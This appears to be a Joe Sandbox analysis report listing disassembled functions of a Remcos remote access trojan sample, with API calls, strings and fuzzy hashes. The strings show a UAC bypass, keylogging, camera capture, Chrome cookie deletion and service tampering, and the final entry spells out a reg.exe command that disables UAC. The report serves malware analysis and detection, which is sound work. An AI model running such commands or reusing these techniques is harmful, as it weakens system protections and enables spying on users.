                                      Uniqueness Score: -1.00%

                                      Function 0043A35A Relevance: 10.6, APIs: 7, Instructions: 60COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,?,0043A351,004392BE), ref: 0043A368
                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0043A376
                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A38F
                                      • SetLastError.KERNEL32(00000000,?,0043A351,004392BE), ref: 0043A3E1
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLastValue___vcrt_
                                      • String ID:
                                      • API String ID: 3852720340-0
                                      • Opcode ID: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                      • Instruction ID: 5d53a0da36a7034647469206452edf011e0dcb0cee8899775f26e7a14c982385
                                      • Opcode Fuzzy Hash: eac7a4b750c305e7b0904a447f782895729b7b2cae8ca2bab40c67d71c469531
                                      • Instruction Fuzzy Hash: 7F01283214C3519EA61526796C86A6B2648EB0A7B9F30133FF918815F1EF594C90514D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004075B0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\AppData\Roaming\NvbYSEq.exe), ref: 004075D0
                                        • Part of subcall function 004074FD: _wcslen.LIBCMT ref: 00407521
                                        • Part of subcall function 004074FD: CoGetObject.OLE32(?,00000024,00466518,00000000), ref: 00407582
                                      • CoUninitialize.OLE32 ref: 00407629
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: InitializeObjectUninitialize_wcslen
                                      • String ID: C:\Users\user\AppData\Roaming\NvbYSEq.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                      • API String ID: 3851391207-1599083158
                                      • Opcode ID: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                      • Instruction ID: 681a2da4e9d4b9e6b45db6330fec0c9e961fb52a18ca78f8243115a9baea1a6b
                                      • Opcode Fuzzy Hash: 511e675c99acabaccc32e6a32445821ea963e9a83317c60cb45550512dba77c0
                                      • Instruction Fuzzy Hash: B201D272B087016BE2245B25DC0EF6B7758DB81729F11083FF902A61C2EBA9BC0145AB
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040BAA1 Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040BADD
                                      • GetLastError.KERNEL32 ref: 0040BAE7
                                      Strings
                                      • UserProfile, xrefs: 0040BAAD
                                      • [Chrome Cookies not found], xrefs: 0040BB01
                                      • [Chrome Cookies found, cleared!], xrefs: 0040BB0D
                                      • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040BAA8
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DeleteErrorFileLast
                                      • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                      • API String ID: 2018770650-304995407
                                      • Opcode ID: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                      • Instruction ID: 6bc0ec4de36c0471385c24d45a27137009bd471b3f80e31671ebbef4da92dce6
                                      • Opcode Fuzzy Hash: 3ac18cd69eb512cfe3046ffff68c330a49271f1a171cc2acfba67e1dc9669370
                                      • Instruction Fuzzy Hash: 08018F31A402095ACA04BBBACD5B8BE7724E912714F50017BF802726E6FE7D5A059ADE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041CD9B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 48memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                      • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                      • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Console$AllocOutputShowWindow
                                      • String ID: Remcos v$4.9.4 Pro$CONOUT$
                                      • API String ID: 2425139147-3065609815
                                      • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                      • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                      • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                      • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044333A Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002), ref: 0044335A
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0044336D
                                      • FreeLibrary.KERNEL32(00000000,?,?,PkGNG,004432EB,00000003,PkGNG,0044328B,00000003,0046E948,0000000C,004433E2,00000003,00000002,00000000,PkGNG), ref: 00443390
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$PkGNG$mscoree.dll
                                      • API String ID: 4061214504-213444651
                                      • Opcode ID: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                      • Instruction ID: b4f1316bd170a33105784e50650a9bde6d9e9410588fddf83d5a1a7bf10dc45d
                                      • Opcode Fuzzy Hash: cc52f7ac488aa55dad4b7db89aaf695af0dd1fe717ea7d7a85019ca2162c21c0
                                      • Instruction Fuzzy Hash: 6AF0A430A00208FBDB149F55DC09B9EBFB4EF04713F0041A9FC05A2261CB349E40CA98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043AADC Relevance: 9.3, APIs: 6, Instructions: 284COMMON
                                      Download Yara Rule
                                      APIs
                                      • __allrem.LIBCMT ref: 0043AC69
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043AC85
                                      • __allrem.LIBCMT ref: 0043AC9C
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACBA
                                      • __allrem.LIBCMT ref: 0043ACD1
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043ACEF
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                      • String ID:
                                      • API String ID: 1992179935-0
                                      • Opcode ID: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                      • Instruction ID: 0cac597ccac2158415e78c81c2c349525783c2449c9f0a8280db41f57d0428da
                                      • Opcode Fuzzy Hash: 324a3f8db7a4af308d45995ace6313bc09822ddcf2faf4fc4501ccf235525b64
                                      • Instruction Fuzzy Hash: CC812B72640706ABE7209F29CC41B5BB3A9EF48324F24552FF590D7781EB7CE9108B5A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404371 Relevance: 9.2, APIs: 1, Strings: 5, Instructions: 206sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000000,?), ref: 004044C4
                                        • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: H_prologSleep
                                      • String ID: CloseCamera$FreeFrame$GetFrame$HNG$OpenCamera
                                      • API String ID: 3469354165-3054508432
                                      • Opcode ID: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                                      • Instruction ID: 62663cdee79800d8a54f028f5a980ee1c6790ad11611a7059aef087dab150aaf
                                      • Opcode Fuzzy Hash: 92d61490a4b2957e555669ba2acdc23e21a020ddb9508585be9bb95eb31fcb07
                                      • Instruction Fuzzy Hash: 5C51E1B1A042116BCA14FB369D0A66E3755ABC5748F00053FFA06677E2EF7C8A45839E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004458F9 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __cftoe
                                      • String ID:
                                      • API String ID: 4189289331-0
                                      • Opcode ID: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                      • Instruction ID: 6c78d09a6f5169ef6f707262af513c71f712f2c279f5202ad8aecd4a6012115a
                                      • Opcode Fuzzy Hash: 73f4726c011166e6bdcb5754414c0ade346116ed487fada7dd59cfb8b2f8224a
                                      • Instruction Fuzzy Hash: D951EA72900A05ABFF209B59CC81FAF77A9EF49334F14421FF515A6293DB39D900866C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041AC78 Relevance: 9.1, APIs: 6, Instructions: 67serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041AC88
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,0041A38E,00000000), ref: 0041AC9C
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACA9
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,0041A38E,00000000), ref: 0041ACDE
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF0
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,0041A38E,00000000), ref: 0041ACF3
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                      • Instruction ID: ed0bae8235b77a8e2b5b4951a925fd67a34dfbd091713fce30693036f81a5133
                                      • Opcode Fuzzy Hash: f3d4b447748c037b2dac55463b57a149c398f0d820f611c96b244fdc7ed94624
                                      • Instruction Fuzzy Hash: 84014E311452147BD6110B385C4DEFB3B5CDB42771F100317F925922D1EA68CD45B5EE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0044A004 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID: PkGNG
                                      • API String ID: 1036877536-263838557
                                      • Opcode ID: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction ID: 0200e234d7a66e392568480c50467de0d06b46efb2a76a7ba0b74d69ca9a70f2
                                      • Opcode Fuzzy Hash: 6e4ce0a9cd107544135c8758f381171db584a835852a0c7515be2cd765a07ccf
                                      • Instruction Fuzzy Hash: 57A166319843869FFB21CF58C8817AEBBA1FF25304F1441AFE9859B382C27D8951C75A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448215 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • GetLastError.KERNEL32(?,0043F720,0043A7F5,0043F720,00474EF8,PkGNG,0043CE15,FF8BC35D,00474EF8,00474EF8), ref: 00448219
                                      • _free.LIBCMT ref: 0044824C
                                      • _free.LIBCMT ref: 00448274
                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 00448281
                                      • SetLastError.KERNEL32(00000000,?,?,00000000), ref: 0044828D
                                      • _abort.LIBCMT ref: 00448293
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                      • Instruction ID: 1e51d54565af68f960eede883612623578b8b4ccb82fc25c91f14e3db4823c68
                                      • Opcode Fuzzy Hash: d577d612c1ffbc00090520c66a2c794f4cb9603406b177c38f93d9dbc2276fca
                                      • Instruction Fuzzy Hash: 15F0F935104F006AF611332A6C05B5F2515ABC276AF25066FF92892292DFACCC4581AD
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041AAA6 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAB5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAC9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAD6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAE5
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAF7
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A623,00000000), ref: 0041AAFA
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                      • Instruction ID: 651adf303b3d55a6ad93a9774d9c6d096703db2647e4265c62a250da7e042a32
                                      • Opcode Fuzzy Hash: bc8933c3fd8e2fa998b2246ab8c72ed9b0f5170f60f0245b371609b51ac54b8f
                                      • Instruction Fuzzy Hash: 68F0C231541218ABD711AF25AC49EFF3B6CDF45BA2F000026FE0992192DB68CD4695E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041ABAA Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABB9
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABCD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABDA
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFB
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5A3,00000000), ref: 0041ABFE
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                      • Instruction ID: cdcae22f94af1ce7d279f83afe572816001e75aa845eac4345c2c81124f82824
                                      • Opcode Fuzzy Hash: 94d93926ec858c5890fc603d54741d931e0eaafa3f6b468ff921a10e10d86c77
                                      • Instruction Fuzzy Hash: 84F0C231501218ABD6116F259C49DFF3B6CDB45B62F40002AFE0996192EB38DD4595F9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041AC11 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                      Download Yara Rule
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC20
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC34
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC41
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC50
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC62
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A523,00000000), ref: 0041AC65
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                      • Instruction ID: 1af6be829003de2eeb85b71d4b0cbdb2c911632148e7083bdbbda8586ff13133
                                      • Opcode Fuzzy Hash: 4f42f77feb4e09d2984437374767d6fba58dab4553ac710dbf5187c031f369c2
                                      • Instruction Fuzzy Hash: 2FF0F631501228BBD711AF25EC49DFF3B6CDB45B62F00002AFE0992192EB38CD4595F9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00442801 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 133COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: PkGNG
                                      • API String ID: 0-263838557
                                      • Opcode ID: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                      • Instruction ID: 497cf8d2f4a88fd96e7f98feeb1d24cd381d204b534fd1f3fd6e485e43360072
                                      • Opcode Fuzzy Hash: 8d454ba49d51131fc87e61242d4279149af29133b98be3a40794271295c3e434
                                      • Instruction Fuzzy Hash: EA413871A00704BFF324AF79CD41B5EBBA9EB88710F10862FF105DB681E7B999418788
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404CC3 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121synchronizationthreadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,00474F50), ref: 00404DB3
                                      • CreateThread.KERNEL32(00000000,00000000,?,00474EF8,00000000,00000000), ref: 00404DC7
                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404DD2
                                      • CloseHandle.KERNEL32(?), ref: 00404DDB
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                      • String ID: PkGNG
                                      • API String ID: 3360349984-263838557
                                      • Opcode ID: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                      • Instruction ID: 465453d6db43d9529954589ba2efa69a6de0eb64d520c2048147815e962fb190
                                      • Opcode Fuzzy Hash: 49fe4c89c4b53e0bfaa247814761066ed204ae0ee87e3a5f8c156f36cd8984b3
                                      • Instruction Fuzzy Hash: 3E4192B1108301AFC714EB62CD55DBFB7EDAFD4314F40093EF992A22E1DB3899098666
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443435 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\NvbYSEq.exe,00000104), ref: 00443475
                                      • _free.LIBCMT ref: 00443540
                                      • _free.LIBCMT ref: 0044354A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: _free$FileModuleName
                                      • String ID: 83$C:\Users\user\AppData\Roaming\NvbYSEq.exe
                                      • API String ID: 2506810119-4175111071
                                      • Opcode ID: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                      • Instruction ID: 78b8e4ab202bb8962dfea6a4c95dea7b8c186c0554b41bb8e719afd17783d6d0
                                      • Opcode Fuzzy Hash: c70776266e2bd8d98222b272a4c4964d73f1f6f6485ba9fff5740fbb3794026e
                                      • Instruction Fuzzy Hash: 2E31C471A00258BFEB21DF999C8199EBBBCEF85B15F10406BF50497311D6B89F81CB98
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040B164 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 68timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,004750F0), ref: 0040B172
                                      • wsprintfW.USER32 ref: 0040B1F3
                                        • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                      • Instruction ID: 81b60f5d3581edaaac31e3e44e1e4f5c322996b2d8bf5e7d6f89c643b346fb92
                                      • Opcode Fuzzy Hash: 48ae87abe5a633f6dbf757c3d9d37f4c5ebff31f90a39cbd1b197af817f8fe73
                                      • Instruction Fuzzy Hash: 82117F72504118AACB18AB96EC558FE77BCEE48315B00012FF506A60E1FF7C9E46C6AC
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040A675 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58sleepfileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,0040A74D), ref: 0040A6AB
                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,0040A74D), ref: 0040A6BA
                                      • Sleep.KERNEL32(00002710,?,?,?,0040A74D), ref: 0040A6E7
                                      • CloseHandle.KERNEL32(00000000,?,?,?,0040A74D), ref: 0040A6EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$CloseCreateHandleSizeSleep
                                      • String ID: XQG
                                      • API String ID: 1958988193-3606453820
                                      • Opcode ID: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                      • Instruction ID: 2d5b847f40b6dc6d65e682cb961bc0859910b41d7418e35cc132b68a4a9af338
                                      • Opcode Fuzzy Hash: 38e21002b9c7a7665831af374e9118a36682828a780468fd2ba8ddd7b6ab83cd
                                      • Instruction Fuzzy Hash: AD112B30600740EEE631A7249895A5F3B6AEB41356F48083AF2C26B6D2C6799CA0C35E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0041D50F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 0041D55B
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                      • GetLastError.KERNEL32 ref: 0041D580
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000C.00000002.1517046290.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_12_2_400000_NvbYSEq.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                      • Instruction ID: 921741f364e14ac5d494c0d6481b3569f22aad0bbfd2e997b493b5423d792a6e
                                      • Opcode Fuzzy Hash: a7bf03488480a67a5ab74e572dd3e9b3283d69d087452f3b28ffeaf09d6b5029
                                      • Instruction Fuzzy Hash: 910129B1D00219BBDB00DFD5ECC49EFBBBDEA04355F40053AF900A6240E77859058AA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00407755 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 0040779B
